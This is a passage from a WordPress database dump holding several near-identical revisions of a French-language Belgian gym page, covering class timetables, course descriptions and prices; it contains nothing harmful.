90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2></h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-10-05 08:48:06', '2013-10-05 08:48:06', '', 11, 'http://www.crosstrainingcenter.be/11-revision-119/', 0, 'revision', '', 0),
(347, 1, '2013-10-05 08:40:45', '2013-10-05 08:40:45', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n<br>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tcellule\"><b>18h</b><br>TRX</td>\r\n<td class=\"tcellule\"><b>17h30</b><br>CARDIO</td>\r\n<td class=\"tcellule\"><b>18h</b><br>RIP-KETTLE</td>\r\n<td class=\"tcellule\"><b>17h30</b><br>GLFE</td>\r\n<td class=\"tcellule\"><b>17h30</b><br>TRX</td>\r\n<td class=\"tcellule\"><b>17h30</b><br>TRX</td>\r\n<td class=\"tcellule\"><b>11h</b><br>GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcellule\"><b>18h30</b><br>GLFE</td>\r\n<td class=\"tcellule\"><b>18h15</b><br>TRX</td>\r\n<td class=\"tcellule\"><b>18h30</b><br>CARDIO</td>\r\n<td class=\"tcellule\"><b>18h15</b><br>RIP-KETTLE</td>\r\n<td class=\"tcellule\"><b>18h15</b><br>GLFE</td>\r\n<td class=\"tcellule\"><b>11h30</b><br>GLFE</td>\r\n<td class=\"tcellule\"><b>11h30</b><br>TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tcellule\"><b>19h</b><br>RIP-KETTLE</td>\r\n<td class=\"tcellule\"><b>19h</b><br>GLFE</td>\r\n<td class=\"tcellule\"><b>19h</b><br>TRX</td>\r\n<td class=\"tcellule\"><b>19h</b><br>CARDIO</td>\r\n<td class=\"tcellule\"><b>19h</b><br>RIP-KETTLE</td>\r\n<td class=\"tcellule\"><b>12h</b><br>RIP-KETTLE</td>\r\n<td class=\"tcellule\"><b>12h</b><br>CARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcellule\"><b>19h45</b><br>CARDIO</td>\r\n<td class=\"tcellule\"><b>19h30</b><br>RIP-KETTLE</td>\r\n<td class=\"tcellule\"><b>19h45</b><br>GLFE</td>\r\n<td class=\"tcellule\"><b>19h15</b><br>TRX</td>\r\n<td class=\"tcellule\"><b>19h45</b><br>CARDIO</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<br>\r\n\r\n\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2></h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-10-05 08:40:45', '2013-10-05 08:40:45', '', 11, 'http://www.crosstrainingcenter.be/11-revision-118/', 0, 'revision', '', 0);
INSERT INTO `www_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(350, 1, '2013-10-05 08:51:08', '2013-10-05 08:51:08', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n<br>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>17h30</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>18h</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>17h30</b><br>TRX</td>\r\n<td class=\"ttrx\"><b>11h</b><br>TRX</td>\r\n<td class=\"tglfe\"><b>11h</b><br>GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h30</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>18h15</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>18h30</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>18h15</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b><br>GLFE</td>\r\n<td class=\"tglfe\"><b>11h30</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>11h30</b><br>TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>19h</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>19h</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>19h</b><br>RIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h</b><br>RIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h</b><br>CARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>19h30</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>19h15</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>19h45</b><br>CARDIO</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<br>\r\n\r\n\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2></h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-10-05 08:51:08', '2013-10-05 08:51:08', '', 11, 'http://www.crosstrainingcenter.be/11-revision-121/', 0, 'revision', '', 0),
(352, 1, '2013-10-05 08:53:02', '2013-10-05 08:53:02', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n<br>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>17h30</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>18h</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>17h30</b><br>TRX</td>\r\n<td class=\"ttrx\"><b>11h</b><br>TRX</td>\r\n<td class=\"tglfe\"><b>11h</b><br>GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h30</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>18h15</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>18h30</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>18h15</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b><br>GLFE</td>\r\n<td class=\"tglfe\"><b>11h30</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>11h30</b><br>TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>19h</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>19h</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>19h</b><br>RIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h</b><br>RIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h</b><br>CARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>19h30</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>19h15</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>19h45</b><br>CARDIO</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<br>\r\n\r\n\r\n\r\n<span style=\"text-decoration: underline; background:#F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2></h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-10-05 08:53:02', '2013-10-05 08:53:02', '', 11, 'http://www.crosstrainingcenter.be/11-revision-123/', 0, 'revision', '', 0),
(353, 1, '2013-10-05 08:54:27', '2013-10-05 08:54:27', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n<br>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>17h30</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>18h</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>17h30</b><br>TRX</td>\r\n<td class=\"ttrx\"><b>11h</b><br>TRX</td>\r\n<td class=\"tglfe\"><b>11h</b><br>GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h30</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>18h15</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>18h30</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>18h15</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b><br>GLFE</td>\r\n<td class=\"tglfe\"><b>11h30</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>11h30</b><br>TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>19h</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>19h</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>19h</b><br>RIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h</b><br>RIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h</b><br>CARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>19h30</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>19h15</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>19h45</b><br>CARDIO</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<br>\r\n\r\n\r\n\r\n<span style=\"text-decoration: underline; background:#F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices 